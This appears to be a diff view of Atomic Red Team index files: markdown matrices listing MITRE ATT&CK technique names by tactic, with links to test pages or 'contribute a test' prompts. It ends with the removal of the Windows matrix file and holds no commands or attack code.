| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
-169
View File
@@ -1,169 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over Web Service](../../T1567/T1567.md) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
